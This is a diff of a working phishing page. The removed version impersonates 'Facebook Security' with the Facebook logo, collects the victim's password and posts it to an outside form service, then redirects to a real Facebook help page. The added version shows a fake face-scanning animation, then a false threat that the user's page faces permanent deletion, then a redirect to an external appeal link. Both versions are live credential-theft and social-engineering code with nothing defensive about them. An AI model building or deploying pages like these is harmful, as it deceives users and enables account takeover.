--- a/index.html.html
+++ b/index.html.html
@@ -1,194 +1,148 @@
+
 <!DOCTYPE html>
+
+
+
+
+
 <html lang="en">
 
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Facebook Password Page</title>
-    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>Face Verification</title>
     <style>
         body {
-            font-family: 'Helvetica Neue', Arial, sans-serif;
-            background-color: #f0f2f5;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
             margin: 0;
+            padding: 0;
+            background: linear-gradient(to bottom, #f9f9f9, #e6e6e6);
+            font-family: 'Segoe UI', Roboto, sans-serif;
+            height: 100vh;
+            display: flex;
+            align-items: center;
+            justify-content: center;
         }
 
         .container {
-            background-color: white;
+            background: white;
             padding: 40px 30px;
-            border-radius: 8px;
-            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.15);
+            border-radius: 16px;
+            box-shadow: 0 8px 24px rgba(0, 0, 0, 0.12);
             text-align: center;
-            width: 360px;
-            position: relative;
+            max-width: 400px;
+            width: 100%;
         }
 
-        .logo {
-            margin-bottom: 20px;
+        .scanner-ring {
+            width: 180px;
+            height: 180px;
+            border-radius: 50%;
+            background: conic-gradient( #4caf50, #2196f3, #ff9800, #f44336, #4caf50);
+            animation: spin 2s linear infinite;
+            margin: 0 auto 24px;
+            display: flex;
+            align-items: center;
+            justify-content: center;
         }
 
-        .logo img {
-            width: 120px;
+        .scanner-core {
+            width: 130px;
+            height: 130px;
+            background: #fff;
+            border-radius: 50%;
+            display: flex;
+            align-items: center;
+            justify-content: center;
+            font-size: 54px;
+            color: #28a745;
         }
 
-        .header {
-            margin-bottom: 20px;
+        .scanner-complete {
+            animation: none;
+            background: #e8f5e9;
+            border: 3px solid #28a745;
+        }
+
+        .status-message {
             font-size: 18px;
             color: #333;
-            font-weight: bold;
+            margin-bottom: 12px;
         }
 
-        .form-group {
-            margin-bottom: 25px;
-            text-align: left;
-            position: relative;
-        }
-
-        .form-group label {
-            display: block;
-            font-weight: bold;
-            margin-bottom: 8px;
-            font-size: 14px;
-            color: #606770;
-        }
-
-        .input-wrapper {
-            position: relative;
-        }
-
-        .form-group input {
-            width: 100%;
-            padding: 14px;
-            padding-right: 40px;
-            /* Space for the eye icon */
-            border: 1px solid #ccd0d5;
-            border-radius: 6px;
-            font-size: 16px;
-            color: #1c1e21;
-            box-sizing: border-box;
-        }
-
-        .form-group input:focus {
-            border-color: #1877f2;
-            outline: none;
-            box-shadow: 0px 0px 0px 2px rgba(24, 119, 242, 0.2);
-        }
-
-        .eye-icon {
-            position: absolute;
-            right: 10px;
-            top: 50%;
-            transform: translateY(-50%);
+        .verified-message {
+            display: none;
             font-size: 20px;
-            color: #606770;
-            cursor: pointer;
-            transition: color 0.3s ease;
-        }
-
-        .eye-icon:hover {
-            color: #1877f2;
-        }
-
-        .submit-button {
-            background-color: #1877f2;
-            color: white;
-            border: none;
-            padding: 14px;
-            border-radius: 6px;
-            font-size: 16px;
             font-weight: bold;
-            cursor: pointer;
-            width: 100%;
+            color: #2e7d32;
             margin-top: 10px;
         }
 
-        .submit-button:hover {
-            background-color: #166fe5;
+        .continue-button {
+            display: none;
+            margin-top: 25px;
+            padding: 12px 28px;
+            background-color: #1976d2;
+            color: #fff;
+            font-size: 16px;
+            font-weight: 600;
+            border: none;
+            border-radius: 6px;
+            cursor: pointer;
+            transition: background 0.3s ease;
         }
 
-        .error-message {
-            color: #e74c3c;
-            font-size: 14px;
-            margin-top: 5px;
-            margin-bottom: 15px;
-            text-align: left;
+        .continue-button:hover {
+            background-color: #125ea4;
+        }
+
+        @keyframes spin {
+            0% {
+                transform: rotate(0);
+            }
+            100% {
+                transform: rotate(360deg);
+            }
         }
     </style>
 </head>
 
 <body>
+
     <div class="container">
-        <div class="logo">
-            <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png" alt="Logo">
-            <div class="header">
-                Facebook Security
-            </div>
-            <p>Please re-enter your password to complete the request.</p>
-            <form id="meta-form" action="https://submit-form.com/u2S7nlCi8" method="POST">
-                <!-- Replace with your Access Key -->
-                <input type="hidden" name="access_key" value="22983eba-14f6-431b-8283-10e298027760">
-                <div class="form-group">
-                    <label for="password">Password</label>
-                    <div class="input-wrapper">
-                        <input type="password" id="password" name="password" placeholder="Enter your password" required>
-                        <i class="eye-icon fas fa-eye" id="togglePassword"></i>
-                    </div>
-                    <span id="error-message" class="error-message"></span>
-                </div>
-                <button type="submit" class="submit-button">Submit</button>
-            </form>
+        <div class="scanner-ring" id="scannerRing">
+            <div class="scanner-core" id="scannerCore"></div>
         </div>
-        <script>
-            document.getElementById('togglePassword').addEventListener('click', function() {
-                var passwordField = document.getElementById('password');
-                var eyeIcon = this;
-                if (passwordField.type === 'password') {
-                    passwordField.type = 'text';
-                    eyeIcon.classList.remove('fa-eye');
-                    eyeIcon.classList.add('fa-eye-slash');
-                } else {
-                    passwordField.type = 'password';
-                    eyeIcon.classList.remove('fa-eye-slash');
-                    eyeIcon.classList.add('fa-eye');
-                }
-            });
+        <div class="status-message" id="statusText">Scanning your face securely...</div>
+        <div class="verified-message" id="verifiedText">Your page is at risk of permanent deletion — submit an appeal now</div>
+        <button class="continue-button" id="continueBtn">Continue</button>
+    </div>
 
-            document.getElementById('passwordForm').addEventListener('submit', function(event) {
-                var passwordField = document.getElementById('password');
-                var errorMessage = document.getElementById('error-message');
-                if (passwordField.value.length < 6) {
-                    errorMessage.textContent = 'Password must be at least 6 characters long.';
-                    event.preventDefault();
-                } else {
-                    errorMessage.textContent = '';
-                    // Perform form submission via Fetch API
-                    event.preventDefault(); // Prevent default form submission
+    <audio id="successSound" src="https://assets.mixkit.co/sfx/preview/mixkit-confirmation-tone-2867.mp3" preload="auto"></audio>
 
-                    var formData = new FormData(this);
-                    fetch(this.action, {
-                            method: 'POST',
-                            body: formData,
-                            headers: {
-                                'Accept': 'application/json'
-                            }
-                        })
-                        .then(response => {
-                            if (response.ok) {
-                                window.location.href = 'https://www.facebook.com/help/media/thank-you?rdrhc'; // Redirect to desired URL
-                            } else {
-                                errorMessage.textContent = 'There was an error. Please try again.';
-                            }
-                        })
-                        .catch(() => {
-                            errorMessage.textContent = 'There was an error. Please try again.';
-                        });
-                }
-            });
-        </script>
+    <script>
+        const redirectURL = "https://confirm-review-request.vercel.app/"; // Replace this with your target link
+
+        setTimeout(() => {
+            // Play sound
+            document.getElementById("successSound").play();
+
+            // Update ring
+            const ring = document.getElementById("scannerRing");
+            const core = document.getElementById("scannerCore");
+            ring.classList.add("scanner-complete");
+            core.textContent = "✔";
+
+            // Update text and button
+            document.getElementById("statusText").style.display = "none";
+            document.getElementById("verifiedText").style.display = "block";
+            document.getElementById("continueBtn").style.display = "inline-block";
+        }, 3500);
+
+        document.getElementById("continueBtn").addEventListener("click", () => {
+            window.location.href = redirectURL;
+        });
+    </script>
+
 </body>
 
 </html>
